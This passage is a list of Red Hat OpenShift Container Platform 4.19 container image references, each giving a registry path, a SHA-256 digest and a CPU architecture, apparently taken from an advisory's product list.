"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
